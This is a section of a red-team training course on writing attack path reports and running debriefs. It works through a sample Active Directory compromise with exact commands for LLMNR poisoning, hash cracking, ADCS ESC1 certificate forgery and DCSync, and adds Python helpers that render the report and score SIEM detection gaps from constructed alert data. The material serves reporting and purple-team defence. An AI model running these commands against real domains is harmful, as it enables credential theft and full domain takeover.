8.5 Attack Path Documentation

What you're building: A clear, reproducible visual attack path that a blue team can follow step-by-step to replay the engagement in their SIEM, validate detections, and understand exactly where controls failed.

Produce clear, reproducible attack path diagrams that show the full kill chain from initial access to objective.

Technique: Visual Kill Chain Mapping

Tools/Templates: Mermaid, draw.io, BloodHound

Procedure:

graph LR
    A([Initial Access: Phishing — WS-01]) --> B[Enumeration: BloodHound collection]
    B --> C[Credential Access: LLMNR poisoning → svc-backup hash]
    C --> D[Lateral Movement: RDP to FILE-01 — svc-backup]
    D --> E[Escalation: ADCS ESC1 → Admin TGT via PKINIT]
    E --> F([Objective: DCSync — full AD compromise])
    style A fill:#ff6600
    style F fill:#ff0000

Step-by-Step Replication Template

  1. Initial Access

    • Technique: Simulated phishing (LNK file)
    • Command: (simulate initial access via agreed method)
    • Output: RDP session established as contoso\jsmith on WS-01 (10.0.1.50)
    • Note: No EDR alert generated
  2. Credential Access — LLMNR Poisoning

    • Technique: LLMNR/NBT-NS poisoning (T1557.001)
    • Command: responder -I eth0 -dwv
    • Output: [*] NTLMv2 hash captured: svc-backup::CONTOSO:...
    • Command: hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
    • Output: svc-backup:Password1! (cracked in 8 seconds)
  3. Lateral Movement

    • Technique: Valid Accounts — Lateral Movement (T1078)
    • Command: xfreerdp /u:svc-backup /p:Password1! /v:FILE-01.contoso.com
    • Output: RDP session on FILE-01 (10.0.1.20)
  4. Privilege Escalation — ADCS ESC1

    • Technique: Steal or Forge Authentication Certificates (T1649)
    • Command: certipy req -u svc-backup@contoso.com -p Password1! -template VulnerableTemplate -ca Contoso-CA -upn administrator@contoso.com
    • Output: administrator.pfx — certificate for Administrator
  5. Objective — DCSync

    • Technique: OS Credential Dumping: DCSync (T1003.006)
    • Command: certipy auth -pfx administrator.pfx -dc-ip 10.0.0.5 then secretsdump.py -k -no-pass contoso.com
    • Output: All NTLM hashes for 847 domain accounts
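
The diagram and the numbered template above describe the same five steps, and in practice they drift apart when edited by hand. The following Python is an added example, not part of the original page or course material: it keeps the replication data in one structure, renders both the Mermaid kill chain and the step-by-step template from it, and checks that no step is missing a command, an output or a host before the section ships. The step content is the page's worked example; the AttackStep fields, function names and placeholder markers are this example's own assumptions.

```python
"""Render an attack path diagram and replication template from one data set."""
from dataclasses import dataclass, field
from itertools import zip_longest


@dataclass
class AttackStep:
    phase: str                                          # kill-chain phase
    technique: str                                      # technique name as reported
    technique_id: str                                   # MITRE ATT&CK ID, "" if not recorded
    host: str                                           # host the step ran on or landed on
    commands: list[str] = field(default_factory=list)   # exact commands, in order
    outputs: list[str] = field(default_factory=list)    # sanitised real output per command
    note: str = ""                                      # e.g. detection outcome


# Step content taken from the page's worked example; the field layout is assumed.
ATTACK_PATH = [
    AttackStep("Initial Access", "Simulated phishing (LNK file)", "", "WS-01",
               ["(simulate initial access via agreed method)"],
               ["RDP session established as contoso\\jsmith on WS-01 (10.0.1.50)"],
               "No EDR alert generated"),
    AttackStep("Credential Access", "LLMNR/NBT-NS poisoning", "T1557.001", "WS-01",
               ["responder -I eth0 -dwv",
                "hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt"],
               ["[*] NTLMv2 hash captured: svc-backup::CONTOSO:...",
                "svc-backup:Password1! (cracked in 8 seconds)"]),
    AttackStep("Lateral Movement", "Valid Accounts", "T1078", "FILE-01",
               ["xfreerdp /u:svc-backup /p:Password1! /v:FILE-01.contoso.com"],
               ["RDP session on FILE-01 (10.0.1.20)"]),
    AttackStep("Privilege Escalation", "ADCS ESC1", "T1649", "FILE-01",
               ["certipy req -u svc-backup@contoso.com -p Password1! -template VulnerableTemplate "
                "-ca Contoso-CA -upn administrator@contoso.com"],
               ["administrator.pfx: certificate for Administrator"]),
    AttackStep("Objective", "DCSync", "T1003.006", "DC 10.0.0.5",
               ["certipy auth -pfx administrator.pfx -dc-ip 10.0.0.5 then "
                "secretsdump.py -k -no-pass contoso.com"],
               ["All NTLM hashes for 847 domain accounts"]),
]

# Strings that indicate an output was never pasted in (assumed markers).
PLACEHOLDER_MARKERS = ("todo", "tbd", "<output>", "xxx")


def to_mermaid(steps):
    """Left-to-right kill chain; entry and objective nodes use the stadium shape."""
    lines = ["graph LR"]
    ids = [chr(ord("A") + i) for i in range(len(steps))]   # A..Z, enough for one path
    for i, s in enumerate(steps):
        # Quote labels so colons, parentheses and slashes cannot break the syntax.
        label = f"{s.phase}: {s.technique} ({s.host})".replace('"', "#quot;")
        stadium = i in (0, len(steps) - 1)
        node = f'{ids[i]}(["{label}"])' if stadium else f'{ids[i]}["{label}"]'
        lines.append(f"    {node}" if i == 0 else f"    {ids[i - 1]} --> {node}")
    lines.append(f"    style {ids[0]} fill:#ff6600")
    lines.append(f"    style {ids[-1]} fill:#ff0000")
    return "\n".join(lines)


def render_template(steps):
    """Numbered replication template with Command/Output pairs interleaved."""
    out = []
    for n, s in enumerate(steps, 1):
        out.append(f"{n}. {s.phase}")
        tid = f" ({s.technique_id})" if s.technique_id else ""
        out.append(f"   - Technique: {s.technique}{tid}")
        for cmd, res in zip_longest(s.commands, s.outputs):
            if cmd is not None:
                out.append(f"   - Command: {cmd}")
            if res is not None:
                out.append(f"   - Output: {res}")
        if s.note:
            out.append(f"   - Note: {s.note}")
    return "\n".join(out)


def validate(steps):
    """Problems that would stop a blue team replaying the path from the report alone."""
    problems = []
    for n, s in enumerate(steps, 1):
        if not s.commands:
            problems.append(f"step {n}: no command recorded")
        if not s.outputs:
            problems.append(f"step {n}: no output recorded")
        for o in s.outputs:
            if any(m in o.lower() for m in PLACEHOLDER_MARKERS):
                problems.append(f"step {n}: output looks like a placeholder: {o!r}")
        if not s.host:
            problems.append(f"step {n}: host missing")
    return problems


if __name__ == "__main__":
    for p in validate(ATTACK_PATH):
        print("WARNING:", p)
    print(to_mermaid(ATTACK_PATH))
    print()
    print(render_template(ATTACK_PATH))
```

Run `validate` as a pre-delivery gate: a step with no recorded output, or with a pasted "TODO", is exactly the fabrication the note at the end of this section warns against, and the check turns that rule into something a reviewer cannot skip.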

Choke Point Identification

NOTE: A blue team should be able to replay your entire attack path using only this section. Every command should be exact and every output should be real (sanitize sensitive data, don't fabricate it).


Engagement Debrief Structure

What you're building: A structured debrief process that ensures findings actually get actioned — the written report is reference material, but the debrief is where security posture actually changes.

The written report is what the client keeps. The debrief is what they act on. Two separate sessions, two separate audiences.

Executive Debrief (30 minutes — CISO, CTO, Board representative)

  1. Scope Reminder (2 min): What was tested, what was not in scope
  2. Overall Risk Posture (5 min): One clear verdict — Critical/High/Medium
  3. Top 3 Findings (10 min): Business consequence language only — no acronyms, no CVE numbers
  4. Crown Jewel Status (5 min): Were the agreed-upon crown jewels reached? How long did it take?
  5. 90-Day Roadmap (8 min): Three prioritized, budgeted remediation tracks

Technical Debrief (60–90 minutes — Security team, IT leads, developers)

  1. Full Attack Path Walkthrough (20 min): Live replay in SIEM or screen share of terminal output
  2. Detection Gap Analysis (15 min): What fired? What should have fired but didn't? Why?
  3. Finding Deep-Dive (30 min): Each finding — technical explanation, reproduction steps, fix guidance
  4. Purple Team Recommendations (10 min): Specific detection rules or queries the blue team should add
  5. Q&A (open): Leave time for the technical team to ask questions about techniques
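
The detection gap analysis in step 2 can be scored mechanically before the debrief instead of argued from memory. The following Python is an added example, not from the original page: it joins the attack timeline to a SIEM alert export on ATT&CK technique ID and time, and labels each step detected, late, missed, or unscored. The technique IDs are those on the page's replication template (step 1 has none there, which is why it comes back unscored); the timestamps, alert records, rule names, the host names DC-01 and CA-01, and the 30-minute window are constructed for the example.

```python
"""Score a replayed attack path against a SIEM alert export."""
import json
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=30)   # an alert within this time after the action counts as detected

# Constructed timeline of the page's worked attack path; timestamps are invented.
TIMELINE = [
    {"step": 1, "phase": "Initial Access",       "technique_id": "",          "time": "2024-03-04T09:12:00"},
    {"step": 2, "phase": "Credential Access",    "technique_id": "T1557.001", "time": "2024-03-04T09:40:00"},
    {"step": 3, "phase": "Lateral Movement",     "technique_id": "T1078",     "time": "2024-03-04T10:05:00"},
    {"step": 4, "phase": "Privilege Escalation", "technique_id": "T1649",     "time": "2024-03-04T10:30:00"},
    {"step": 5, "phase": "Objective: DCSync",    "technique_id": "T1003.006", "time": "2024-03-04T11:02:00"},
]

# Constructed SIEM alert export (JSON lines). Rule names and hosts DC-01/CA-01 are assumptions.
ALERT_LINES = """\
{"time": "2024-03-04T09:41:00", "rule": "AV signature update", "technique_id": "", "host": "WS-01"}
{"time": "2024-03-04T10:07:30", "rule": "Interactive logon by service account", "technique_id": "T1078", "host": "FILE-01"}
{"time": "2024-03-04T11:03:10", "rule": "DS replication from non-DC host", "technique_id": "T1003.006", "host": "DC-01"}
{"time": "2024-03-04T14:30:00", "rule": "Cert request with foreign UPN in SAN", "technique_id": "T1649", "host": "CA-01"}
"""


def parse_alerts(text):
    """One JSON object per line; blank lines are skipped, times become datetimes."""
    alerts = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        a = json.loads(line)
        a["time"] = datetime.fromisoformat(a["time"])
        alerts.append(a)
    return alerts


def analyze(timeline, alerts, window=WINDOW):
    """Per step: detected (first matching alert within window), late, missed, or unscored."""
    results = []
    for step in timeline:
        t0 = datetime.fromisoformat(step["time"])
        row = {"step": step["step"], "phase": step["phase"], "technique_id": step["technique_id"],
               "status": "missed", "rule": None, "delay_min": None}
        if not step["technique_id"]:
            row["status"] = "unscored"   # nothing to join on: fix the report, not the SIEM
        else:
            # Only alerts at or after the action count; earlier ones belong to something else.
            hits = sorted((a for a in alerts
                           if a["technique_id"] == step["technique_id"] and a["time"] >= t0),
                          key=lambda a: a["time"])
            if hits:
                delay = hits[0]["time"] - t0
                row["rule"] = hits[0]["rule"]
                row["delay_min"] = delay.total_seconds() / 60
                row["status"] = "detected" if delay <= window else "late"
        results.append(row)
    return results


def coverage(results):
    """Fraction of scorable steps detected in time (late counts as not detected)."""
    scorable = [r for r in results if r["status"] != "unscored"]
    if not scorable:
        return 0.0
    return sum(r["status"] == "detected" for r in scorable) / len(scorable)


def render(results):
    """Plain-text gap table for the technical debrief."""
    lines = [f"{'Step':<5}{'Phase':<22}{'ATT&CK':<11}{'Status':<10}{'Delay':>8}  Rule"]
    for r in results:
        delay = "" if r["delay_min"] is None else f"{r['delay_min']:.1f}m"
        lines.append(f"{r['step']:<5}{r['phase']:<22}{r['technique_id'] or '-':<11}"
                     f"{r['status']:<10}{delay:>8}  {r['rule'] or '-'}")
    mins = int(WINDOW.total_seconds() // 60)
    lines.append(f"coverage: {coverage(results):.0%} of scorable steps detected within {mins} min")
    return "\n".join(lines)


if __name__ == "__main__":
    print(render(analyze(TIMELINE, parse_alerts(ALERT_LINES))))
```

The "late" status is the one worth discussing in the room: an ESC1 alert that fires four hours after the certificate request exists in the SIEM, so a coverage matrix built from rule names alone would show it as covered, while the timeline shows the attacker had already reached DCSync before anyone could have acted on it.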

Why: The written report is a reference document — clients file it and return to it when budgeting or planning. The debrief is where learning happens. A skilled red teamer who can explain their techniques clearly in a debrief is worth 2x a technician who only writes.


Part of Pillar 8: Reporting & Portfolio Development.